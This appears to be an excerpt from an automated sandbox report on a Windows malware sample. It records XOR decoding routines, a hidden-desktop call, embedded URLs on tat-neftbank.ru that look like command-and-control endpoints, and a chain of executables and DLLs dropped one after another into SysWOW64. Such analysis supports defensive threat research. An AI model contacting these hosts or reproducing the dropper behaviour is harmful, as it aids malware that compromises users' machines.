Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then loop 00403B3Eh | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then mov eax, 0042A000h | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then mov ebx, 0042CD70h | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then sub ecx, eax | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then xor edx, edx | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then push eax | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then div edi | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then xchg eax, ecx | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then add eax, edi | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then loop 00403B9Eh | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then popad | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then je 00403A1Ch | 12_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 12_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then inc eax | 12_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then jne 004039F2h | 12_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then mov eax, 0042A000h | 12_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then je 00403A52h | 12_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 12_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then add eax, 04h | 12_2_004039CE
Source: h879iieoae.exe, Fhedeo32.exe.36.dr, Odekfoij.exe.8.dr, Efgkjnfn.exe.33.dr, Bgibkegc.exe.21.dr, Feidnc32.exe.37.dr, Bgamkfnl.exe.17.dr, Cnjaioih.exe.26.dr, Oeanchcn.exe.5.dr, Dfcboo32.exe.30.dr, Ggmnlk32.exe.39.dr, Baagdk32.exe.22.dr, Bnnampcf.exe.19.dr, Eoappk32.exe.34.dr, Olijjb32.exe.4.dr, Oceoll32.exe.6.dr, Ajkolbad.exe.15.dr, Pqeoao32.exe.13.dr, Cfnpmb32.exe.23.dr, Dnhmjm32.exe.29.dr, Foaigifk.exe.38.dr | String found in binary or memory: http://oracle.com/contracts
Source: Fkogfkdj.exe.35.dr | String found in binary or memory: http://oracle.com/contracts.
Source: h879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe | String found in binary or memory: http://tat-neftbank.ru/kkq.php
Source: h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe, 0000000A.00000002.1986379697.000000000042A000.00000004.00000001.01000000.0000000D.sdmp, Ppllkpoo.exe, 0000000B.00000002.1988867655.000000000042A000.00000004.00000001.01000000.0000000E.sdmp, Plbmqa32.exe, 0000000C.00000002.1990903099.000000000042A000.00000004.00000001.01000000.0000000F.sdmp, Plgflqpn.exe, 0000000D.00000002.1993494029.000000000042A000.00000004.00000001.01000000.00000010.sdmp, Pqeoao32.exe, 0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp, Qgcpihjl.exe, 0000000F.00000002.2000063573.000000000042A000.00000004.00000001.01000000.00000012.sdmp, Ajkolbad.exe, 00000010.00000002.2000741077.000000000042A000.00000004.00000001.01000000.00000013.sdmp, Bmlhnnne.exe, 00000011.00000002.2001790871.000000000042A000.00000004.00000001.01000000.00000014.sdmp, Bgamkfnl.exe, 00000012.00000002.2002333377.000000000042A000.00000004.00000001.01000000.00000015.sdmp, Bqjacldl.exe, 00000013.00000002.2003694218.000000000042A000.00000004.00000001.01000000.00000016.sdmp, Bnnampcf.exe, 00000014.00000002.2004277931.000000000042A000.00000004.00000001.01000000.00000017.sdmp | String found in binary or memory: http://tat-neftbank.ru/kkq.phphttp://tat-neftbank.ru/wcmd.htmSoftware
Source: h879iieoae.exe, h879iieoae.exe, 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp, Nejhbi32.exe, Nejhbi32.exe, 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp, Ogjdllpi.exe, Ogjdllpi.exe, 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp, Opbieagi.exe, Opbieagi.exe, 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp, Oglabl32.exe, Oglabl32.exe, 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp, Olijjb32.exe, Olijjb32.exe, 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmp, Oeanchcn.exe, Oeanchcn.exe, 00000006.00000002.1984946818.000000000042A000.00000004.00000001.01000000.00000009.sdmp, Oceoll32.exe, Oceoll32.exe, 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp, Onkcje32.exe, Onkcje32.exe, 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp, Odekfoij.exe, Odekfoij.exe, 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp, Ojacofgb.exe | String found in binary or memory: http://tat-neftbank.ru/wcmd.htm
Source: h879iieoae.exe, Fhedeo32.exe.36.dr, Odekfoij.exe.8.dr, Efgkjnfn.exe.33.dr, Bgibkegc.exe.21.dr, Feidnc32.exe.37.dr, Bgamkfnl.exe.17.dr, Cnjaioih.exe.26.dr, Oeanchcn.exe.5.dr, Dfcboo32.exe.30.dr, Ggmnlk32.exe.39.dr, Baagdk32.exe.22.dr, Bnnampcf.exe.19.dr, Eoappk32.exe.34.dr, Olijjb32.exe.4.dr, Oceoll32.exe.6.dr, Ajkolbad.exe.15.dr, Pqeoao32.exe.13.dr, Cfnpmb32.exe.23.dr, Dnhmjm32.exe.29.dr, Foaigifk.exe.38.dr | String found in binary or memory: http://www.oracle.com/education/oln.
Source: C:\Users\user\Desktop\h879iieoae.exe | Code function: 0_2_0040431F GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,SetThreadDesktop, | 0_2_0040431F

System Summary

Source: h879iieoae.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Nejhbi32.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Ogjdllpi.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Opbieagi.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Oglabl32.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Olijjb32.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Oeanchcn.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Oceoll32.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Onkcje32.exe.7.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Odekfoij.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Ojacofgb.exe.9.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Ppllkpoo.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Plbmqa32.exe.11.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Plgflqpn.exe.12.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Pqeoao32.exe.13.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Qgcpihjl.exe.14.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Ajkolbad.exe.15.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Bmlhnnne.exe.16.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Bgamkfnl.exe.17.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Bqjacldl.exe.18.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Bnnampcf.exe.19.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Bnpnbp32.exe.20.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Bgibkegc.exe.21.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Baagdk32.exe.22.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Cfnpmb32.exe.23.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Ccapffke.exe.24.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Ceampi32.exe.25.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Cnjaioih.exe.26.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Camgpi32.exe.27.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Dmfdkj32.exe.28.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Dnhmjm32.exe.29.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Dfcboo32.exe.30.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Edgbhcim.exe.31.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Emogai32.exe.32.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Efgkjnfn.exe.33.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Eoappk32.exe.34.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Fkogfkdj.exe.35.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Fhedeo32.exe.36.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Feidnc32.exe.37.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Foaigifk.exe.38.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Ggmnlk32.exe.39.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\h879iieoae.exe | File created: C:\Windows\SysWOW64\Nejhbi32.exe
Source: C:\Users\user\Desktop\h879iieoae.exe | File created: C:\Windows\SysWOW64\Nejhbi32.exe:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\h879iieoae.exe | File created: C:\Windows\SysWOW64\Jcofqqkm.dll
Source: C:\Windows\SysWOW64\Nejhbi32.exe | File created: C:\Windows\SysWOW64\Ogjdllpi.exe
Source: C:\Windows\SysWOW64\Nejhbi32.exe | File created: C:\Windows\SysWOW64\Bpghkh32.dll
Source: C:\Windows\SysWOW64\Ogjdllpi.exe | File created: C:\Windows\SysWOW64\Opbieagi.exe
Source: C:\Windows\SysWOW64\Ogjdllpi.exe | File created: C:\Windows\SysWOW64\Fkdfmkhi.dll
Source: C:\Windows\SysWOW64\Opbieagi.exe | File created: C:\Windows\SysWOW64\Oglabl32.exe
Source: C:\Windows\SysWOW64\Opbieagi.exe | File created: C:\Windows\SysWOW64\Hjanmb32.dll
Source: C:\Windows\SysWOW64\Oglabl32.exe | File created: C:\Windows\SysWOW64\Olijjb32.exe
Source: C:\Windows\SysWOW64\Oglabl32.exe | File created: C:\Windows\SysWOW64\Jdackq32.dll
Source: C:\Windows\SysWOW64\Olijjb32.exe | File created: C:\Windows\SysWOW64\Oeanchcn.exe
Source: C:\Windows\SysWOW64\Olijjb32.exe | File created: C:\Windows\SysWOW64\Ligdce32.dll
Source: C:\Windows\SysWOW64\Oeanchcn.exe | File created: C:\Windows\SysWOW64\Oceoll32.exe
Source: C:\Windows\SysWOW64\Oeanchcn.exe | File created: C:\Windows\SysWOW64\Pdkggn32.dll
Source: C:\Windows\SysWOW64\Oceoll32.exe | File created: C:\Windows\SysWOW64\Onkcje32.exe
Source: C:\Windows\SysWOW64\Oceoll32.exe | File created: C:\Windows\SysWOW64\Fehgpcld.dll
Source: C:\Windows\SysWOW64\Onkcje32.exe | File created: C:\Windows\SysWOW64\Odekfoij.exe
Source: C:\Windows\SysWOW64\Onkcje32.exe | File created: C:\Windows\SysWOW64\Jgemldcp.dll
Source: C:\Windows\SysWOW64\Odekfoij.exe | File created: C:\Windows\SysWOW64\Ojacofgb.exe
Source: C:\Windows\SysWOW64\Odekfoij.exe | File created: C:\Windows\SysWOW64\Bdlhdkdf.dll
Source: C:\Windows\SysWOW64\Ojacofgb.exe | File created: C:\Windows\SysWOW64\Ppllkpoo.exe
Source: C:\Windows\SysWOW64\Ojacofgb.exe | File created: C:\Windows\SysWOW64\Accicdme.dll
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | File created: C:\Windows\SysWOW64\Plbmqa32.exe
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | File created: C:\Windows\SysWOW64\Chfnmf32.dll
Source: C:\Windows\SysWOW64\Plbmqa32.exe | File created: C:\Windows\SysWOW64\Plgflqpn.exe
Source: C:\Windows\SysWOW64\Plbmqa32.exe | File created: C:\Windows\SysWOW64\Lfcadoap.dll
Source: C:\Windows\SysWOW64\Plgflqpn.exe | File created: C:\Windows\SysWOW64\Pqeoao32.exe
Source: C:\Windows\SysWOW64\Plgflqpn.exe | File created: C:\Windows\SysWOW64\Akghbg32.dll
Source: C:\Windows\SysWOW64\Pqeoao32.exe | File created: C:\Windows\SysWOW64\Qgcpihjl.exe
Source: C:\Windows\SysWOW64\Pqeoao32.exe | File created: C:\Windows\SysWOW64\Clqdacnn.dll
Source: C:\Windows\SysWOW64\Qgcpihjl.exe | File created: C:\Windows\SysWOW64\Ajkolbad.exe
Source: C:\Windows\SysWOW64\Qgcpihjl.exe | File created: C:\Windows\SysWOW64\Khlnhl32.dll
Source: C:\Windows\SysWOW64\Ajkolbad.exe | File created: C:\Windows\SysWOW64\Bmlhnnne.exe
Source: C:\Windows\SysWOW64\Ajkolbad.exe | File created: C:\Windows\SysWOW64\Iemjhp32.dll
Source: C:\Windows\SysWOW64\Bmlhnnne.exe | File created: C:\Windows\SysWOW64\Bgamkfnl.exe
Source: C:\Windows\SysWOW64\Bmlhnnne.exe | File created: C:\Windows\SysWOW64\Mfdadc32.dll
Source: C:\Windows\SysWOW64\Bgamkfnl.exe | File created: C:\Windows\SysWOW64\Bqjacldl.exe
Source: C:\Windows\SysWOW64\Bgamkfnl.exe | File created: C:\Windows\SysWOW64\Pdmohf32.dll
Source: C:\Windows\SysWOW64\Bqjacldl.exe | File created: C:\Windows\SysWOW64\Bnnampcf.exe
Source: C:\Windows\SysWOW64\Bqjacldl.exe | File created: C:\Windows\SysWOW64\Lfjejf32.dll
Source: C:\Windows\SysWOW64\Bnnampcf.exe | File created: C:\Windows\SysWOW64\Bnpnbp32.exe
Source: C:\Windows\SysWOW64\Bnnampcf.exe | File created: C:\Windows\SysWOW64\Ekpjke32.dll
Source: C:\Windows\SysWOW64\Bnpnbp32.exe | File created: C:\Windows\SysWOW64\Bgibkegc.exe
Source: C:\Windows\SysWOW64\Bnpnbp32.exe | File created: C:\Windows\SysWOW64\Pkjmee32.dll
Source: C:\Windows\SysWOW64\Bgibkegc.exe | File created: C:\Windows\SysWOW64\Baagdk32.exe
Source: C:\Windows\SysWOW64\Bgibkegc.exe | File created: C:\Windows\SysWOW64\Foelkeee.dll
Source: C:\Windows\SysWOW64\Baagdk32.exe | File created: C:\Windows\SysWOW64\Cfnpmb32.exe
Source: C:\Windows\SysWOW64\Baagdk32.exe | File created: C:\Windows\SysWOW64\Fcjdhk32.dll
Source: C:\Windows\SysWOW64\Cfnpmb32.exe | File created: C:\Windows\SysWOW64\Ccapffke.exe
Source: C:\Windows\SysWOW64\Cfnpmb32.exe | File created: C:\Windows\SysWOW64\Ibigijoc.dll
Source: C:\Windows\SysWOW64\Ccapffke.exe | File created: C:\Windows\SysWOW64\Ceampi32.exe
Source: C:\Windows\SysWOW64\Ccapffke.exe | File created: C:\Windows\SysWOW64\Ipqipqal.dll
Source: C:\Windows\SysWOW64\Ceampi32.exe | File created: C:\Windows\SysWOW64\Cnjaioih.exe
Source: C:\Windows\SysWOW64\Ceampi32.exe | File created: C:\Windows\SysWOW64\Hjjfnehb.dll
Source: C:\Windows\SysWOW64\Cnjaioih.exe | File created: C:\Windows\SysWOW64\Camgpi32.exe
Source: C:\Windows\SysWOW64\Cnjaioih.exe | File created: C:\Windows\SysWOW64\Ahhhnd32.dll
Source: C:\Windows\SysWOW64\Camgpi32.exe | File created: C:\Windows\SysWOW64\Dmfdkj32.exe
Source: C:\Windows\SysWOW64\Camgpi32.exe | File created: C:\Windows\SysWOW64\Ibbpip32.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Dnhmjm32.exe
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Hjdhea32.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Dfcboo32.exe
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Ekpkmk32.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Edgbhcim.exe
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Pfgpqb32.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Emogai32.exe
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Kfnpbj32.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Efgkjnfn.exe
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Flhljo32.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Eoappk32.exe
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Gfdcflnh.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Fkogfkdj.exe
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Lbfpda32.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Fhedeo32.exe
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Ajikgq32.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Feidnc32.exe
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Njaakj32.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Foaigifk.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Hdgplo32.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ggmnlk32.exe
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ckaenpam.dll
Source: C:\Users\user\Desktop\h879iieoae.exe  Code function: 0_2_0042B884
Source: C:\Windows\SysWOW64\Nejhbi32.exe  Code function: 1_2_0042B884
Source: C:\Windows\SysWOW64\Ogjdllpi.exe  Code function: 2_2_0042B884
Source: C:\Windows\SysWOW64\Opbieagi.exe  Code function: 3_2_0042B884
Source: C:\Windows\SysWOW64\Oglabl32.exe  Code function: 4_2_0042B884
Source: C:\Windows\SysWOW64\Olijjb32.exe  Code function: 5_2_0042B884
Source: C:\Windows\SysWOW64\Oeanchcn.exe  Code function: 6_2_0042B884
Source: C:\Windows\SysWOW64\Oceoll32.exe  Code function: 7_2_0042B884
Source: C:\Windows\SysWOW64\Onkcje32.exe  Code function: 8_2_0042B884
Source: C:\Windows\SysWOW64\Odekfoij.exe  Code function: 9_2_0042B884
Source: C:\Windows\SysWOW64\Ojacofgb.exe  Code function: 10_2_0042B884
Source: C:\Windows\SysWOW64\Ppllkpoo.exe  Code function: 11_2_0042B884
Source: C:\Windows\SysWOW64\Plbmqa32.exe  Code function: 12_2_0042B884
Source: C:\Windows\SysWOW64\Plgflqpn.exe  Code function: 13_2_0042B884
Source: C:\Windows\SysWOW64\Pqeoao32.exe  Code function: 14_2_0042B884
Source: C:\Windows\SysWOW64\Qgcpihjl.exe  Code function: 15_2_0042B884
Source: C:\Windows\SysWOW64\Ajkolbad.exe  Code function: 16_2_0042B884
Source: C:\Windows\SysWOW64\Bmlhnnne.exe  Code function: 17_2_0042B884
Source: C:\Windows\SysWOW64\Bgamkfnl.exe  Code function: 18_2_0042B884
Source: C:\Windows\SysWOW64\Bqjacldl.exe  Code function: 19_2_0042B884
Source: C:\Windows\SysWOW64\Bnnampcf.exe  Code function: 20_2_0042B884
Source: C:\Windows\SysWOW64\Bnpnbp32.exe  Code function: 21_2_0042B884
Source: C:\Windows\SysWOW64\Bgibkegc.exe  Code function: 22_2_0042B884
Source: C:\Windows\SysWOW64\Baagdk32.exe  Code function: 23_2_0042B884
Source: C:\Windows\SysWOW64\Cfnpmb32.exe  Code function: 24_2_0042B884
Source: C:\Windows\SysWOW64\Ccapffke.exe  Code function: 25_2_0042B884
Source: C:\Windows\SysWOW64\Ceampi32.exe  Code function: 26_2_0042B884
Source: C:\Windows\SysWOW64\Cnjaioih.exe  Code function: 27_2_0042B884
Source: C:\Windows\SysWOW64\Oceoll32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Ogjdllpi.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Bnnampcf.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Plgflqpn.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Ajkolbad.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Plbmqa32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Bgibkegc.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Odekfoij.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Users\user\Desktop\h879iieoae.exe  Code function: String function: 00407EA4 appears 43 times
